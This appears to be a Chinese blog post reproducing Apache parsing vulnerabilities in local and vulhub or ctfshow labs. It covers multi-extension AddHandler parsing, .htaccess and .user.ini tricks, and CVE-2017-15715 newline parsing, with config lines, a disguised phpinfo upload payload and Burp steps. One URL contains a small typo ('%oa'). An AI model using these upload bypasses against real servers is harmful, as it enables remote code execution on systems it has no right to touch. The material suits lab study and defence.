当前位置:网站首页>中间件漏洞复现—apache
中间件漏洞复现—apache
2022-07-06 09:22:00 【又懒有菜】
目录
0x0d Apache HTTPD 换行解析漏洞 (CVE-2017-15715)
0x0a httpd-conf配置不当(多文件名解析漏洞)
AddHandler application/x-httpd-php .php
在有多个后缀的情况下,只要含有.php后缀,就能被识别成PHP文件。
本地复现:
编辑文件h:ttpd-conf(apache/conf/http-conf):
添加:AddHandler application/x-httpd-php .php
编辑文件:phpinfo.php.jpg
写入:<?php phpinfo();?>
访问:127.0.0.1/phpinfo.php.jpg
0x0b .htaccess解析漏洞
AddType application/x-httpd-php .jpg 该路径下的jpg文件通过http都会被解析为php文件
本地复现:
上传.htaccess文件(本地)
编辑:AddType application/x-httpd-php .jpg
上传phpinfo.jpg文件(本地)
编辑:GIF89a<?php phpinfo();?>
访问: 127.0.0.1/phpinfo.jpg
0x0c .user.ini解析漏洞
环境ctfshow web 153
原理:php文件包含 .user.ini
auto_append_file=filename //同级目录每个php文件尾加上 include(“filename”)
auto_prepend_file=filename //同级目录文件头加上 include(“filename”)
上传 1.png
<?php phpinfo();?>
注意: 然后访问文件下的任意一个php即可 因为有index.php所以不需要上传php进行解析
0x0d Apache HTTPD 换行解析漏洞 (CVE-2017-15715)
环境:vulhub
影响版本:2.4.0~2.4.29版本
环境启动:
- 在CVE-2017-15715文件夹右键打开终端
- sudo docker-compose up -d
- 访问 ip+8000
burp抓包 修改参数值
在evil.php后面加c——>选中code修改——>0a
访问url:192.168.0.10:8080/evil.php%oa
总结: 思维导图
边栏推荐
- About the parental delegation mechanism and the process of class loading
- Strengthen basic learning records
- 【VMware异常问题】问题分析&解决办法
- Wechat applet
- Implementation of count (*) in MySQL
- 7-14 错误票据(PTA程序设计)
- 使用Spacedesk实现局域网内任意设备作为电脑拓展屏
- Why use redis
- Strengthen basic learning records
- Experiment 9 input and output stream (excerpt)
猜你喜欢
这次,彻底搞清楚MySQL索引
Mixlab unbounded community white paper officially released
4. Branch statements and loop statements
. How to upload XMIND files to Jinshan document sharing online editing?
UGUI—Text
Renforcer les dossiers de base de l'apprentissage
Programme de jeu de cartes - confrontation homme - machine
FAQs and answers to the imitation Niuke technology blog project (II)
【黑马早报】上海市监局回应钟薛高烧不化;麦趣尔承认两批次纯牛奶不合格;微信内测一个手机可注册俩号;度小满回应存款变理财产品...
canvas基础1 - 画直线(通俗易懂)
随机推荐
Mixlab unbounded community white paper officially released
重载和重写的区别
4. Branch statements and loop statements
About the parental delegation mechanism and the process of class loading
The difference between abstract classes and interfaces
Why use redis
仿牛客技术博客项目常见问题及解答(三)
2022 Teddy cup data mining challenge question C idea and post game summary
【MySQL数据库的学习】
Differences among fianl, finally, and finalize
深度强化文献阅读系列(一):Courier routing and assignment for food delivery service using reinforcement learning
This time, thoroughly understand the MySQL index
1. Preliminary exercises of C language (1)
[MySQL table structure and integrity constraint modification (Alter)]
It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan
Strengthen basic learning records
canvas基础2 - arc - 画弧线
FAQs and answers to the imitation Niuke technology blog project (II)
7-1 输出2到n之间的全部素数(PTA程序设计)
fianl、finally、finalize三者的区别